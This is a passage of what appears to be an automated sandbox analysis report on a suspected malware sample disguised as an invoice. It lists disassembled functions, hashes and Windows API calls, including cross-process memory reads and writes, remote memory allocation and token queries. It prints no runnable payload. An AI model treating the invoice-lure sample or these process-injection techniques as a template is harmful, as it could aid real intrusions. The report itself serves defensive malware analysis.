                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: 8ce145742ec1e4e7596329ccb0b2b49268db9e2514a09447b6a9de516f00e923
                                                              • Instruction ID: b8d413dd7ff45000b50407dcf0c4de383bcb5dbcfd1910805a98bcdcbee33530
                                                              • Opcode Fuzzy Hash: 8ce145742ec1e4e7596329ccb0b2b49268db9e2514a09447b6a9de516f00e923
                                                              • Instruction Fuzzy Hash: 0D01A276A10225BFDB108F98FC48B9A7BFDEF48355F144028F909D2220D7B1DD919BA0
                                                              Function 0022AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0022AA79
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0022AA83
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0022AA92
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0022AA99
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0022AAAF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: bd9e22b04f3b477d1d03b5150605709c90be9c369c217c3de0bc8bffe41e75bc
                                                              • Instruction ID: 1cadd7a3b21c233cba9db732bff2f712dd3d7837450aeeed51c58a476fb6921c
                                                              • Opcode Fuzzy Hash: bd9e22b04f3b477d1d03b5150605709c90be9c369c217c3de0bc8bffe41e75bc
                                                              • Instruction Fuzzy Hash: 51F0AF35201216BFEB101FA4BC8CE673BBCFF49754F000429F909D7190DA609C92CA61
                                                              Function 0022AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0022AADA
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0022AAE4
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0022AAF3
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0022AAFA
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0022AB10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 8801378568a48e80a58759aa8a7821f297fc9120789983d82dcb52d6adc8037d
                                                              • Instruction ID: 641566d0bda536e100f2d783920814d342762d299f25653a382d107b22ba8758
                                                              • Opcode Fuzzy Hash: 8801378568a48e80a58759aa8a7821f297fc9120789983d82dcb52d6adc8037d
                                                              • Instruction Fuzzy Hash: F7F04F7521031ABFEB110FA4FC88E673B7DFF46758F100029F949D71A0CA619851CA61
                                                              Function 0022EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0022EC94
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0022ECAB
                                                              • MessageBeep.USER32(00000000), ref: 0022ECC3
                                                              • KillTimer.USER32(?,0000040A), ref: 0022ECDF
                                                              • EndDialog.USER32(?,00000001), ref: 0022ECF9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: 928ed10a9256347c7769721ff04494af03f2b1e9b02f91d26ac1411d0e804a52
                                                              • Instruction ID: 031ce42464b0e045aa52cd80a3c36a7a4d23aa00b504f6664c85e1ca7501103a
                                                              • Opcode Fuzzy Hash: 928ed10a9256347c7769721ff04494af03f2b1e9b02f91d26ac1411d0e804a52
                                                              • Instruction Fuzzy Hash: B4018130510715ABEF246F90FE5EB9677B8FF00705F01055AB686A14E0DBF0AA94DB40
                                                              Function 0020B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 0020B0BA
                                                              • StrokeAndFillPath.GDI32(?,?,0026E680,00000000,?,?,?), ref: 0020B0D6
                                                              • SelectObject.GDI32(?,00000000), ref: 0020B0E9
                                                              • DeleteObject.GDI32 ref: 0020B0FC
                                                              • StrokePath.GDI32(?), ref: 0020B117
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: 4cb9445e00f441e73f1934b8becd64ffcc158dd93a5fa0b3699f514e315a6b6e
                                                              • Instruction ID: b23af41548f535a686b629498175b542d3d941bb3b5a569132f087ec4bc5e4f5
                                                              • Opcode Fuzzy Hash: 4cb9445e00f441e73f1934b8becd64ffcc158dd93a5fa0b3699f514e315a6b6e
                                                              • Instruction Fuzzy Hash: FFF0B231010249AFDB229F6AFC1D7A53B69AB10362F888315E42D851F1C73189B6DF50
                                                              Function 0023F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0023F2DA
                                                              • CoCreateInstance.OLE32(0027DA7C,00000000,00000001,0027D8EC,?), ref: 0023F2F2
                                                              • CoUninitialize.OLE32 ref: 0023F555
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 948891078-24824748
                                                              • Opcode ID: 16f71bbb5989c2da7b0a92971d15ddf4fb016f1a6d52bf2326880ce1765ed08e
                                                              • Instruction ID: f0ac31b7ba9fff95281028ceba63b8ccad24d79d50be68b01d5befc80b4e0a29
                                                              • Opcode Fuzzy Hash: 16f71bbb5989c2da7b0a92971d15ddf4fb016f1a6d52bf2326880ce1765ed08e
                                                              • Instruction Fuzzy Hash: 99A139B1114305AFD300EF64C885EABB7ACEF98714F00491EF65597192EB70EA59CBA2
                                                              Function 0023E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001F53B1,?,?,001F61FF,?,00000000,00000001,00000000), ref: 001F662F
                                                              • CoInitialize.OLE32(00000000), ref: 0023E85D
                                                              • CoCreateInstance.OLE32(0027DA7C,00000000,00000001,0027D8EC,?), ref: 0023E876
                                                              • CoUninitialize.OLE32 ref: 0023E893
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: ff9e699b2fb081168a5b389a4051f2b08eb65e02abaccbba423afa5a9be6af9b
                                                              • Instruction ID: 466ee0db3de8f0310c288399922d98edcf5883ed1e4ccf8173754f4bd1733adb
                                                              • Opcode Fuzzy Hash: ff9e699b2fb081168a5b389a4051f2b08eb65e02abaccbba423afa5a9be6af9b
                                                              • Instruction Fuzzy Hash: 3CA146756043059FCB10EF24C484E6EBBE5BF89710F058999F99A9B3A1CB31EC49CB91
                                                              Function 0021325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 002132ED
                                                                • Part of subcall function 0021E0D0: __87except.LIBCMT ref: 0021E10B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: 93822cb87ecee2d01830cabe96f1efd082a323a974dd89d7f8716fd315c32256
                                                              • Instruction ID: ec064982094be1bbfb72a705c9f4cb9d04bedc6050f1525faa32b34aa07e0301
                                                              • Opcode Fuzzy Hash: 93822cb87ecee2d01830cabe96f1efd082a323a974dd89d7f8716fd315c32256
                                                              • Instruction Fuzzy Hash: D3514431A3920396CF11BF14DD153FA2BD5AB70710F208968FCA5821A9DF758DF89A86
                                                              Function 00234606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0028DC50,?,0000000F,0000000C,00000016,0028DC50,?), ref: 00234645
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002346C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                              • String ID: REMOVE$THIS
                                                              • API String ID: 3797816924-776492005
                                                              • Opcode ID: b561c7e5494adb46a4f39463aeff22f615e7965b88011be622727e54cabc0788
                                                              • Instruction ID: b0c57724d43ede20206c8bc07fa037e371e8ba52aa4a85d1793c08bc4c422daf
                                                              • Opcode Fuzzy Hash: b561c7e5494adb46a4f39463aeff22f615e7965b88011be622727e54cabc0788
                                                              • Instruction Fuzzy Hash: C24183B4A1021A9FCF00FF64C881ABDB7B5FF45304F148099E916AB292DB30ED55CB50
                                                              Function 0022C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0023430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0022BC08,?,?,00000034,00000800,?,00000034), ref: 00234335
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0022C1D3
                                                                • Part of subcall function 002342D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0022BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00234300
                                                                • Part of subcall function 0023422F: GetWindowThreadProcessId.USER32(?,?), ref: 0023425A
                                                                • Part of subcall function 0023422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0022BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0023426A
                                                                • Part of subcall function 0023422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0022BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00234280
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0022C240
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0022C28D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 5f7565fad19d3ac84a60fd444e99a2937dff983d4ebe7a916c1b1a41ea49a4eb
                                                              • Instruction ID: 848f902aca32f66e254fc1310ef81bcdc66489b4891aad9bb5628d9a8361fa83
                                                              • Opcode Fuzzy Hash: 5f7565fad19d3ac84a60fd444e99a2937dff983d4ebe7a916c1b1a41ea49a4eb
                                                              • Instruction Fuzzy Hash: 6B4139B2900229BFDB10EFA4DC81AEEB7B8AF09300F104195FA55B7191DA717E95CF61
                                                              Function 0025A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0028DC00,00000000,?,?,?,?), ref: 0025A6D8
                                                              • GetWindowLongW.USER32 ref: 0025A6F5
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0025A705
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: c0741313d5859cb8940fd6bd80a26f8c59bc832f384ec8573e07345e289196e1
                                                              • Instruction ID: 7b9fab757a5b16f1515026f143df64f016056fe79d52f59620cc083a85dce11d
                                                              • Opcode Fuzzy Hash: c0741313d5859cb8940fd6bd80a26f8c59bc832f384ec8573e07345e289196e1
                                                              • Instruction Fuzzy Hash: 4B31AD31620206ABDF218E38DC46BEA77A9FF49324F244715F979931E0C770E8648B94
                                                              Function 00245180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00245190
                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 002451C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CrackInternet_memset
                                                              • String ID: |$D$
                                                              • API String ID: 1413715105-2694590288
                                                              • Opcode ID: ccd93ba7c9a39cf2eb6e8725472365d94b7f7c28534061e2f72aaeecd217f7ce
                                                              • Instruction ID: e2e30056ee696c9bfab032f283656cd60a1defc6d23b2fa9135bbf736874d27f
                                                              • Opcode Fuzzy Hash: ccd93ba7c9a39cf2eb6e8725472365d94b7f7c28534061e2f72aaeecd217f7ce
                                                              • Instruction Fuzzy Hash: 4D314A71C1011DABCF05EFA4CD85AEEBFB9FF24700F000116F905A6166DB71AA56DBA0
                                                              Function 0025A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0025A15E
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0025A172
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0025A196
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 68a00365bc3ed6e8b82f42f1dd8ef270d314cd2096df3a974ad5e54437e9797a
                                                              • Instruction ID: 27db706d532677a65007d6e27411cfc0f9d88612954f4d449c2716646c67b299
                                                              • Opcode Fuzzy Hash: 68a00365bc3ed6e8b82f42f1dd8ef270d314cd2096df3a974ad5e54437e9797a
                                                              • Instruction Fuzzy Hash: FF21F132520219ABDF118F94CC42FEA3B79FF48714F004214FE19AB1D0D6B1AC64CBA4
                                                              Function 0025A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0025A941
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0025A94F
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0025A956
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: 0ddcaa4ad9f2221c9f94a4b432abfdc1027be0821bb22ea1645fdf3fe08003ee
                                                              • Instruction ID: d64876ff5ec8ec780a2afe01a00299b58171715a3a7cedb0bee03c1793b6145a
                                                              • Opcode Fuzzy Hash: 0ddcaa4ad9f2221c9f94a4b432abfdc1027be0821bb22ea1645fdf3fe08003ee
                                                              • Instruction Fuzzy Hash: 9721C4B561020AAFDB10DF14DC96D7737ADEF5E3A4B050159FA0497251CB30EC25CB61
                                                              Function 002599A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00259A30
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00259A40
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00259A65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: f3c09f7767bf25325322ba72f3444903231698e705cb710255f48ea8b3bc0d2a
                                                              • Instruction ID: da028165fbc03b1c4419c5c1b19d6af6654681615cd3d9d76a60fdb653330351
                                                              • Opcode Fuzzy Hash: f3c09f7767bf25325322ba72f3444903231698e705cb710255f48ea8b3bc0d2a
                                                              • Instruction Fuzzy Hash: 8421F532620119BFDF118F54DC85EBB3BBEEF89751F018128FD4497190C6719CA58BA4
                                                              Function 0025A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0025A46D
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0025A482
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0025A48F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
